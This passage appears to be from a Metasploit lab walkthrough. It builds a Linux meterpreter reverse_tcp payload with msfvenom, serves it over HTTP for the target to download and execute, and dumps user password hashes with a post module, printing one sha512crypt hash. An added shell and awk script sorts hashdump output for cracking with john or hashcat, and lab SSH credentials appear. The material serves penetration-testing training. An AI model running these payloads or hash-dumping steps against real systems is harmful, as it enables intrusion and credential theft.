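    printf 'set LPORT %s\n' "$lport"
    # Keep listening after the first session so a second execution is caught too.
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

if [ "$#" -gt 0 ]; then
    handler_rc_from_msfvenom "$@"
fi
```

Because the same argument string drives both msfvenom and the handler, a typo in LPORT shows up once, in both places, rather than as a silent mismatch.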
Answer the questions
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.
$ sudo su
[sudo] password for murphy: 1q2w3e4r
root@ip-10-10-9-56:/#
Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.23.177.52 LPORT=4444 -f elf > shell.elf
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
$ mkdir web
$ mv shell.elf web/
$ python3 -m http.server 9000
Get a meterpreter session on the target machine.
Prepare the listener:
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.23.177.52
msf exploit(multi/handler) > run
Activate the exploit:
root@ip-10-10-9-56:/# wget http://10.23.177.52:9000/shell.elf
root@ip-10-10-9-56:/# chmod +x shell.elf
root@ip-10-10-9-56:/# ./shell.elf
Use a post exploitation module to dump hashes of other users on the system.
msf > search type:post name:linux hash
msf > use post/linux/gather/hashdump
msf post(linux/gather/hashdump) > set SESSION 1
msf post(linux/gather/hashdump) > run
claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/bash
What is the other user's password hash?
Answer: $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
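Both hashdump outputs on this page (the Windows one from meterpreter > hashdump in the Exploitation task, and the Linux one from post/linux/gather/hashdump here) need the same triage before you spend cracking time on them: identify the hash format, separate what is crackable from what is not, and notice blank or locked accounts. The following is an added example, not from the original room: a POSIX shell/awk function that does this for both formats. The sample lines are constructed for the example; the hashes are copied from the two outputs on this page, and the locked nobody line is made up to show that case. The NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known hash of the empty string, so the Administrator and Guest entries above carry an empty password (typically a disabled built-in account) and are not worth cracking.

```shell
#!/bin/sh
# Added example (not from the original room). Triage Metasploit hashdump
# output from Windows (meterpreter hashdump) and Linux (post/linux/gather/hashdump)
# into one "os user hash verdict" line per account.

# Constructed sample input: hashes copied from the outputs shown on this page,
# plus a made-up locked account to show that case.
WIN_SAMPLE='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::'

LINUX_SAMPLE='claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/bash
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin'

EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty string
EMPTY_LM='aad3b435b51404eeaad3b435b51404ee'   # LM hash of the empty string (LM storage disabled)

# triage_hashes: reads hashdump lines on stdin, prints "os user hash verdict".
triage_hashes() {
    awk -F: -v empty_nt="$EMPTY_NT" -v empty_lm="$EMPTY_LM" '
    # Windows pwdump format: user:rid:lmhash:nthash:::
    $2 ~ /^[0-9]+$/ && length($3) == 32 && length($4) == 32 {
        if ($4 == empty_nt)        verdict = "BLANK-PASSWORD"
        else if ($3 != empty_lm)   verdict = "crack:LM+NTLM"   # real LM hash: far weaker, crack it first
        else                       verdict = "crack:NTLM"
        printf "win %s %s %s\n", $1, $4, verdict
        next
    }
    # Linux shadow-style field: $id$salt$hash
    $2 ~ /^\$[0-9a-z]+\$/ {
        split($2, f, "$")
        if (f[2] == "6")      alg = "sha512crypt"
        else if (f[2] == "5") alg = "sha256crypt"
        else if (f[2] == "1") alg = "md5crypt"
        else if (f[2] == "y") alg = "yescrypt"
        else                  alg = "unknown-" f[2]
        printf "linux %s %s crack:%s\n", $1, $2, alg
        next
    }
    # "*", "!" or "!!" leading the hash field: account locked / no password login
    $2 ~ /^[!*]/ { printf "linux %s - LOCKED\n", $1; next }
    { printf "unknown %s - UNPARSED\n", $1 }
    '
}

# crackable_only: keep just the lines worth feeding to john/hashcat, as user:hash
crackable_only() {
    awk '$4 ~ /^crack:/ { printf "%s:%s\n", $2, $3 }'
}

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$WIN_SAMPLE" "$LINUX_SAMPLE" | triage_hashes
fi
```

Running sh triage.sh demo on the constructed input reports the two blank Windows accounts, pirate as crack:NTLM, claire as crack:sha512crypt and nobody as LOCKED; piping the triage output through crackable_only yields a user:hash list ready for john or hashcat (use -m 1000 for NTLM and -m 1800 for sha512crypt in hashcat).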
You should now have a better understanding of how Metasploit can help you identify potential vulnerabilities on target systems and exploit these vulnerabilities.
You have also seen how the database feature can help you with penetration testing engagements where you have multiple potential targets.
Finally, you should have gained some experience with msfvenom and the creation of stand-alone Meterpreter payloads.
This is especially helpful in situations where you can upload a file to the target system or have the ability to download files to the target system. Meterpreter is a powerful tool that offers a lot of easy to use features during the post-exploitation phase.